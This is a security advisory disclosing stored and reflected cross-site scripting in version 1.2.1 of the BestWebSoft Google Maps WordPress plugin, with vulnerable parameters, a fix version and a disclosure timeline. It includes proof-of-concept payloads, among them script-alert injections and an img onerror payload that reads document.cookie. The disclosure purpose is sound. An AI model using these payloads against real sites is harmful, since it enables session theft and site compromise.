Plugin Name : BestWebSoft Google Maps
 
Effected Version : 1.2.1 (and most probably lower version's if any)
 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Madhu Akula
 

 
Technical Details
 
Minimum Level of Access Required : Administrator
 
PoC - (Proof of Concept) :
 
The following fields put the payload as below
 
http://localhost/wp-admin/admin.php?page=gglmps_editor&noheader=true
 
gglmps_map_title = “><script>alert(1)</script>
 
http://localhost/wp-admin/admin.php?page=bws-google-maps.php
 
gglmps_main_api_key = “><script>alert(3)</script>
 
http://localhost/wp-admin/admin.php?page=bws-google-maps.php&action=go_pro
 
bws_license_key = “><img src=x onerror=prompt(document.cookie);>
 
 
Vulnerable Parameter : gglmps_map_title, gglmps_main_api_key, bws_license_key
 
Type of XSS : Reflected / Stored
 
Fixed in : 1.2.2
 
http://wordpress.org/plugins/bws-google-maps/changelog/
 
Disclosure Timeline
 
Vendor Contacted : 2014-08-04
 
Plugin Status : Updated on 2014-08-07
 
Public Disclosure : October 3, 2015
 
CVE Number : Not assigned yet
 
Plugin Description :
 
This plugin allows you to configure Google Maps and add them to your site quickly and easily. In the Google Maps Editor, you can configure basic settings and add any number of markers. In the Google Maps manager you can view the saved maps and edit them easily. With the help of the shortcode you can insert Google maps in posts and the widgets.